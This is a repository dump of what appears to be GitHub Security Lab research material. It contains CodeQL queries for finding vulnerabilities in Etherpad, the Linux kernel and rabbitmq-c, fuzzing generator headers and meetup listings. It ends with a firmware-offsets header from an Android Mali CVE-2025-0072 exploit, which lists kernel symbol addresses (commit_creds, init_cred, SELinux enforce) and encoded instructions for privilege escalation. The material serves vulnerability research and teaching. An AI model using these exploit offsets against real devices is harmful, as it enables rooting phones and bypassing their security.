--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-javascript
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.javascript.library
5 |
6 | com.semmle.code.javascript.dbscheme
7 |
8 | javascript
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
3 | /**
4 | * A function with `req` and `res` parameters, and hence most likely an
5 | * HTTP route handler.
6 | */
7 | class LikelyRouteHandler extends DataFlow::FunctionNode {
8 | DataFlow::ParameterNode req;
9 | DataFlow::ParameterNode res;
10 |
11 | LikelyRouteHandler() {
12 | req = getParameter(0) and req.getName() = "req" and
13 | res = getParameter(1) and res.getName() = "res"
14 | }
15 | }
16 |
17 | // Find HTTP route handlers, using the heuristic of looking for parameters
18 | // named `req` and `res`.
19 | from LikelyRouteHandler l
20 | select l
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
3 | /**
4 | * A function with `req` and `res` parameters, and hence most likely an
5 | * HTTP route handler.
6 | */
7 | class LikelyRouteHandler extends DataFlow::FunctionNode {
8 | DataFlow::ParameterNode req;
9 | DataFlow::ParameterNode res;
10 |
11 | LikelyRouteHandler() {
12 | req = getParameter(0) and req.getName() = "req" and
13 | res = getParameter(1) and res.getName() = "res"
14 | }
15 |
16 | /** Gets a method of `res` that sends an HTTP response. */
17 | string getASendMethodName() {
18 | // res.send
19 | result = "send"
20 | or
21 | // or a method `m` such that there is an assignment `res.m = res.n` where `n`
22 | // is already known to be a send method
23 | exists (DataFlow::PropWrite pwn |
24 | pwn = res.getAPropertyWrite(result) and
25 | pwn.getRhs() = getASendMethodReference()
26 | )
27 | }
28 |
29 | /** Gets a reference to `res.send` or some other known send method. */
30 | DataFlow::PropRead getASendMethodReference() {
31 | result = res.getAPropertyRead(getASendMethodName())
32 | }
33 |
34 | /** Gets a call to the send method. */
35 | DataFlow::CallNode getASendMethodCall() {
36 | result = getASendMethodReference().getACall()
37 | }
38 | }
39 |
40 | // Find `send` calls, which is where the code is sending a reply message.
41 | from LikelyRouteHandler l
42 | select l.getASendMethodCall()
43 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/etherpad-reflected-file-download/)
2 |
3 | [This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability.
4 |
5 | For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-patched-codeql-database/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Reflected cross-site scripting vulnerability
3 | * @kind path-problem
4 | * @problem.severity warning
5 | * @id js/reflected-xss
6 | */
7 |
8 | import javascript
9 | import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss
10 | import DataFlow::PathGraph
11 |
12 | from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
13 | where cfg.hasFlowPath(source, sink)
14 | select sink.getNode(), source, sink, "Cross-site scripting vulnerability due to $@.",
15 | source.getNode(), "user-provided value"
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
3 | /** Gets a data flow node that represents an instance of `swagger-node`. */
4 | DataFlow::Node swaggerInstance() {
5 | result = DataFlow::moduleImport("swagger-node-express")
6 | or
7 | result.getAPredecessor() = swaggerInstance()
8 | or
9 | result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
10 | or
11 | result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
12 | }
13 |
14 | /** An Express route handler installed via `swagger-node`. */
15 | class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
16 | SwaggerRouteHandler() {
17 | exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
18 | addGet.calls(swaggerInstance(), "addGet") and
19 | resource = addGet.getArgument(0).getALocalSource() and
20 | this = resource.getAPropertySource("action")
21 | )
22 | }
23 |
24 | override SimpleParameter getRouteHandlerParameter(string kind) {
25 | kind = "request" and result = getParameter(0).getParameter()
26 | or
27 | kind = "response" and result = getParameter(1).getParameter()
28 | }
29 |
30 | override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
31 | }
32 |
33 | from SwaggerRouteHandler srh
34 | select srh
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
3 | /** Gets a data flow node that represents an instance of `swagger-node`. */
4 | DataFlow::Node swaggerInstance() {
5 | result = DataFlow::moduleImport("swagger-node-express")
6 | or
7 | result.getAPredecessor() = swaggerInstance()
8 | or
9 | result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
10 | or
11 | result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
12 | }
13 |
14 | /** An Express route handler installed via `swagger-node`. */
15 | class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
16 | SwaggerRouteHandler() {
17 | exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
18 | addGet.calls(swaggerInstance(), "addGet") and
19 | resource = addGet.getArgument(0).getALocalSource() and
20 | this = resource.getAPropertySource("action")
21 | )
22 | }
23 |
24 | override SimpleParameter getRouteHandlerParameter(string kind) {
25 | kind = "request" and result = getParameter(0).getParameter()
26 | or
27 | kind = "response" and result = getParameter(1).getParameter()
28 | }
29 |
30 | override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
31 | }
32 |
33 | from HTTP::ResponseSendArgument rsa
34 | select rsa
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
3 | /** Gets a data flow node that represents an instance of `swagger-node`. */
4 | DataFlow::Node swaggerInstance() {
5 | result = DataFlow::moduleImport("swagger-node-express")
6 | or
7 | result.getAPredecessor() = swaggerInstance()
8 | or
9 | result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
10 | or
11 | result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
12 | }
13 |
14 | /** An Express route handler installed via `swagger-node`. */
15 | class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
16 | SwaggerRouteHandler() {
17 | exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
18 | addGet.calls(swaggerInstance(), "addGet") and
19 | resource = addGet.getArgument(0).getALocalSource() and
20 | this = resource.getAPropertySource("action")
21 | )
22 | }
23 |
24 | override SimpleParameter getRouteHandlerParameter(string kind) {
25 | kind = "request" and result = getParameter(0).getParameter()
26 | or
27 | kind = "response" and result = getParameter(1).getParameter()
28 | }
29 |
30 | override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
31 | }
32 |
33 | from SwaggerRouteHandler rh, PropAccess send
34 | where send.accesses(rh.getAResponseExpr(), "send")
35 | select send
36 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-javascript
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-javascript
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Conferences/2020/H-CON/HC0N.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/H-CON/HC0N.pdf
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/cant-grep-this.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/OffensiveCon/cant-grep-this.pdf
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
4 | class KMalloc extends Function {
5 | KMalloc() { getName() = "kmalloc" }
6 | }
7 |
8 | from KMalloc fun, FunctionCall source, Expr sink
9 | where
10 | source = fun.getACallToThisFunction() and
11 | DataFlow::localExprFlow(source, sink)
12 | select source, sink, sink.getEnclosingStmt()
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
4 | class KMalloc extends Function {
5 | KMalloc() { getName() = "kmalloc" }
6 | }
7 |
8 | from KMalloc fun, FunctionCall source
9 | where
10 | source = fun.getACallToThisFunction() and
11 | not exists(IfStmt sink | DataFlow::localExprFlow(source, sink.getControllingExpr()))
12 | select source
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
4 | class KMalloc extends Function {
5 | KMalloc() {
6 | getName() = "kmalloc" or
7 | getName() = "acpi_os_allocate_zeroed" or
8 | getName() = "kzalloc" or
9 | getName() = "kcalloc" or
10 | getName() = "kmalloc_array" or
11 | getName() = "acpi_os_allocate" or
12 | getName() = "mempool_kmalloc" or
13 | getName() = "alloc_resource" or
14 | getName() = "bitmap_alloc" or
15 | getName() = "sg_kmalloc" or
16 | getName() = "pcpu_mem_zalloc" or
17 | getName() = "bitmap_zalloc"
18 | }
19 | }
20 |
21 | from KMalloc fun, FunctionCall source
22 | where
23 | source = fun.getACallToThisFunction() and
24 | not exists(IfStmt sink |
25 | DataFlow::localExprFlow(source, sink.getControllingExpr().getAChild*())
26 | )
27 | select source
28 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Function fun
4 | where fun.getName().matches("%ioctl%") and fun.hasDefinition()
5 | select fun
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Function fun, FunctionCall call
4 | where
5 | fun.getName().matches("%ioctl%") and
6 | fun.hasDefinition() and
7 | call = fun.getACallToThisFunction()
8 | select call.getEnclosingFunction(), call
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Function fun, FunctionAccess access
4 | where
5 | fun.getName().matches("%ioctl%") and
6 | access = fun.getAnAccess()
7 | select access, fun
8 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class UnusedFunction extends Function {
4 | UnusedFunction() {
5 | this.hasDefinition() and
6 | not exists(FunctionCall call | call.getTarget() = this) and
7 | not exists(FunctionAccess access | access.getTarget() = this)
8 | }
9 | }
10 |
11 | from UnusedFunction unused
12 | select unused
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class UnusedVariable extends LocalVariable {
4 | UnusedVariable() { not exists(VariableAccess access | access.getTarget() = this) }
5 | }
6 |
7 | from UnusedVariable unused
8 | select unused
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class InterestingAssignment extends Assignment {
4 | InterestingAssignment() {
5 | this.getRValue().getUnderlyingType() != this.getLValue().getUnderlyingType()
6 | }
7 | }
8 |
9 | from InterestingAssignment unused
10 | select unused, unused.getLValue().getUnderlyingType(), unused.getRValue().getUnderlyingType()
11 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/tainttracking/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
4 | from MacroInvocation macro, Expr e1, Expr e2
5 | where
6 | macro.getMacroName() = "_IOC_SIZE" and
7 | e1 = macro.getExpr() and
8 | TaintTracking::localExprTaint(e1, e2)
9 | select e1, e2
10 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call
4 | where call.getTarget().getName() = "recv"
5 | select call
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call
4 | where call.getTarget().getName() = "amqp_tcp_socket_recv"
5 | select call
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionAccess access
4 | where access.getTarget().getName() = "amqp_tcp_socket_recv"
5 | select access
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Struct struct
4 | where struct.getName() = "amqp_socket_class_t"
5 | select struct
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Struct struct, Field recv
4 | where
5 | struct.getName() = "amqp_socket_class_t" and
6 | recv = struct.getAField() and
7 | recv.getName() = "recv"
8 | select struct, recv.getAnAccess()
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call
4 | where call.getTarget().getName() = "amqp_socket_recv"
5 | select call
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex6.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
4 | class NetworkBytes extends FieldAccess {
5 | NetworkBytes() {
6 | this.getQualifier().getType().getName() = "amqp_bytes_t" and
7 | this.getTarget().getName() = "bytes"
8 | }
9 | }
10 |
11 | from NetworkBytes bytes
12 | select bytes
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex7.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class TargetFunction extends Function {
4 | TargetFunction() { this.getName() = "amqp_pool_alloc_bytes" }
5 | }
6 |
7 | from TargetFunction fun
8 | select fun.getACallToThisFunction()
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex8.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
4 | class NetworkBytes extends FieldAccess {
5 | NetworkBytes() {
6 | this.getQualifier().getType().getName() = "amqp_bytes_t" and
7 | this.getTarget().getName() = "bytes"
8 | }
9 | }
10 |
11 | class TargetFunction extends Function {
12 | TargetFunction() { this.getName() = "amqp_pool_alloc_bytes" }
13 | }
14 |
15 | class Config extends TaintTracking::Configuration {
16 | Config() { this = "rabbitmq-c" }
17 |
18 | override predicate isSource(DataFlow::Node source) { source.asExpr() instanceof NetworkBytes }
19 |
20 | override predicate isSink(DataFlow::Node sink) {
21 | exists(TargetFunction function, FunctionCall call |
22 | call = function.getACallToThisFunction() and
23 | call.getAnArgument() = sink.asExpr()
24 | )
25 | }
26 | }
27 |
28 | from Config config, DataFlow::Node source, DataFlow::Node sink
29 | where config.hasFlow(source, sink)
30 | select source, sink
31 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call
4 | where call.getAnArgument() instanceof SizeofOperator
5 | select call
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call
4 | where call.getAnArgument().getAChild*() instanceof SizeofOperator
5 | select call
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call, Expr child
4 | where
5 | call.getTarget().getName() = "kmalloc" and
6 | child = call.getAnArgument().getAChild*() and
7 | child instanceof SizeofOperator
8 | select call, child
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call, Expr child, Expr sized
4 | where
5 | call.getTarget().getName() = "kmalloc" and
6 | child = call.getAnArgument().getAChild*() and
7 | child instanceof SizeofOperator and
8 | sized = child.getChild(0) and
9 | sized.getUnderlyingType() instanceof PointerType
10 | select call, sized, sized.getUnderlyingType()
11 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call, Expr size
4 | where
5 | call.getTarget().getName() = "kmalloc" and
6 | size = call.getArgument(0)
7 | select call, size, size.getValue().toInt()
8 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from FunctionCall call, Expr size
4 | where
5 | call.getTarget().getName() = "kmalloc" and
6 | size = call.getArgument(0) and
7 | size instanceof MulExpr
8 | select call, size
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from VariableAccess access
4 | where access.getTarget().getName() = "current_task"
5 | select access.getEnclosingFunction()
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from Variable var
4 | where var.getName().matches("%buffer%")
5 | select var
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from LocalVariable var
4 | select var
5 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from GlobalOrNamespaceVariable var
4 | select var
5 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from GlobalOrNamespaceVariable var
4 | where var.getName() = "current_task"
5 | select var.getAnAccess()
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from GlobalOrNamespaceVariable var
4 | where var.getName() = "current_task"
5 | select var.getAnAccess().getEnclosingFunction()
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex6.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | from GlobalOrNamespaceVariable var
4 | select var, count(var.getAnAccess())
5 |
--------------------------------------------------------------------------------
/Conferences/2020/RootedCON/Presentacion.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/RootedCON/Presentacion.pdf
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/README.md:
--------------------------------------------------------------------------------
1 | # MP4 corpus generator
2 | An MP4 corpus generator
3 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/aux.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include
6 |
7 | inline uint32_t rand_uint32(uint32_t min_value, uint32_t max_value) {
8 |
9 | static std::random_device rd;
10 | static std::mt19937 gen(rd());
11 |
12 | uint32_t rand_number;
13 |
14 | std::uniform_int_distribution<> dist(min_value, max_value);
15 |
16 | rand_number = dist(gen);
17 |
18 | return rand_number;
19 | }
20 |
21 |
22 | inline std::string uint32_to_string(uint32_t fourcc){
23 |
24 | std::string output = "";
25 |
26 | output += fourcc & 0xFF;
27 | output += (fourcc >> 8) & 0xFF;
28 | output += (fourcc >> 16) & 0xFF;
29 | output += (fourcc >> 24) & 0xFF;
30 |
31 | return output;
32 | }
33 |
34 |
35 | inline std::string uint32_to_string_BE(uint32_t fourcc){
36 |
37 | std::string output = "";
38 |
39 | output += (fourcc >> 24) & 0xFF;
40 | output += (fourcc >> 16) & 0xFF;
41 | output += (fourcc >> 8) & 0xFF;
42 | output += fourcc & 0xFF;
43 |
44 | return output;
45 | }
46 |
47 |
48 | inline bool write_to_file(const std::string &content, std::filesystem::path file){
49 |
50 | std::ofstream ofs(file, std::ios::out | std::ios::binary);
51 |
52 | if (!ofs) {
53 | return false;
54 | }
55 |
56 | ofs << content;
57 |
58 | ofs.close();
59 |
60 | return true;
61 | }
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/labeler/MP4.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 |
6 | #include
7 |
8 | #include "fourcc.h"
9 | #include "labeler.h"
10 |
11 |
12 | class MP4_labeler : public Labeler{
13 |
14 | private:
15 |
16 | RandomTree *tree;
17 |
18 | std::string traverse(Node &node);
19 |
20 | public:
21 |
22 | MP4_labeler(RandomTree *in_tree);
23 |
24 | std::string serialize();
25 | };
26 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/labeler/labeler.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
5 | class Labeler{
6 |
7 | protected:
8 |
9 | std::string priv_name;
10 |
11 | };
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/makefile:
--------------------------------------------------------------------------------
1 | CPPFLAGS = -g -O2
2 |
3 | SRC = tree.cc labeler/MP4.cc
4 | INC = ./ ./labeler
5 |
6 | all: generator
7 |
8 | generator: $(SRC) main.cc
9 | g++ main.cc -I./ -I./labeler $(SRC) $(CPPFLAGS) -o generator
10 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/tree.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 |
6 | #include
7 |
8 | class Node{
9 |
10 | friend class RandomTree;
11 |
12 | private:
13 |
14 | int32_t id = -1;
15 | int32_t parent_id = -1;
16 | std::vector prv_children = {};
17 | int32_t depth = -1;
18 |
19 | std::string label;
20 |
21 |
22 | public:
23 |
24 | Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth);
25 |
26 | const std::vector& children() const;
27 |
28 | std::string get_label() const;
29 |
30 | uint32_t get_id() const;
31 |
32 | void set_label(const std::string &in_label);
33 |
34 | };
35 |
36 |
37 | class RandomTree{
38 |
39 | friend class Labeler;
40 |
41 | private:
42 |
43 | std::vector nodes;
44 |
45 | std::vector> levels;
46 |
47 | uint32_t num_nodes = 0;
48 |
49 | uint32_t tree_depth = 0;
50 |
51 | uint32_t new_node(int32_t parent_id, uint32_t depth);
52 |
53 | public:
54 |
55 | RandomTree(uint32_t total_nodes);
56 |
57 |
58 | Node & get_node(uint32_t node_id);
59 |
60 | size_t size() const;
61 |
62 | std::string dot_format() const;
63 |
64 | };
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019 GitHub, Inc.
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining
4 | a copy of this software and associated documentation files (the
5 | "Software"), to deal in the Software without restriction, including
6 | without limitation the rights to use, copy, modify, merge, publish,
7 | distribute, sublicense, and/or sell copies of the Software, and to
8 | permit persons to whom the Software is furnished to do so, subject to
9 | the following conditions:
10 |
11 | The above copyright notice and this permission notice shall be
12 | included in all copies or substantial portions of the Software.
13 |
14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/Meetup/2019-11/README.md:
--------------------------------------------------------------------------------
1 | # GitHub Security Lab Meet-Up
2 |
3 | - Newbie fuzzing gains: Getting the most of your iterations by @antonio-morales
4 | - OSS-Fuzz: 3 years of running an automated and continuous fuzzing service by Abhishek Arya
5 | - Using QL to find MIN_INT gotcha by @kevinbackhouse
6 | - Bug Hunting with CodeQL by @agustingianni
7 |
--------------------------------------------------------------------------------
/Meetup/2019-11/presentations/Bug hunting with CodeQL.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2019-11/presentations/Bug hunting with CodeQL.pdf
--------------------------------------------------------------------------------
/Meetup/2019-11/presentations/Newbie fuzzing gains.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2019-11/presentations/Newbie fuzzing gains.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/Breaking-SAML-dotNet-Edition.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/Breaking-SAML-dotNet-Edition.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/Hunting-Backdoors-in-Open-Source.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/Hunting-Backdoors-in-Open-Source.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/No-More-Whack-A-Mole.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/No-More-Whack-A-Mole.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/README.md:
--------------------------------------------------------------------------------
1 | # Presentations
2 |
3 | - James Forshaw - **Researching Local Windows RPC in PowerShell** _Live demo, no slides_
4 | - Alvaro Muñoz - **Breaking SAML (.NET Edition)**
5 | - Michael Scovetta - **Hunting Backdoors in Open Source**
6 | - Sam Lanning - **No more whack-a-mole**
7 |
--------------------------------------------------------------------------------
/Meetup/2020-04/Managing-content-security-and-samesite-cookies.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/Managing-content-security-and-samesite-cookies.pdf
--------------------------------------------------------------------------------
/Meetup/2020-04/README.md:
--------------------------------------------------------------------------------
1 | # Presentations
2 |
3 | - **Andrea Brancaleoni** - [InQL: GraphQL security testing made easy!](./inql.pdf)
4 | - **Stefan Edwards and Robert Tonic** - [Go-ing for an evening stroll](https://github.com/lojikil/kyoto-go-nihilism)
5 | - **Alyssa Miller** - [Security In the User Story, DevSecOps Compatible Threat Modeling](ThreatModelDevOps-GitHubSecMeetup.pdf)
6 | - **Neil Matatall** - [Managing content security policy and samesite cookies](Managing-content-security-and-samesite-cookies.pdf)
7 |
8 |
--------------------------------------------------------------------------------
/Meetup/2020-04/ThreatModelDevOps-GitHubSecMeetup.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/ThreatModelDevOps-GitHubSecMeetup.pdf
--------------------------------------------------------------------------------
/Meetup/2020-04/inql.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/inql.pdf
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef FIRMWARE_OFFSETS_H
2 | #define FIRMWARE_OFFSETS_H
3 |
4 | #define AVC_DENY_2411 0x839c60
5 |
6 | #define SEL_READ_ENFORCE_2411 0x84bf40
7 |
8 | #define INIT_CRED_2411 0x280c948
9 |
10 | #define COMMIT_CREDS_2411 0x174f38
11 |
12 | #define ADD_COMMIT_2411 0x913ce108 //add x8, x8, #0xf38
13 |
14 | #define ADD_INIT_2411 0x91252000 //add x0, x0, #0x948
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h:
--------------------------------------------------------------------------------
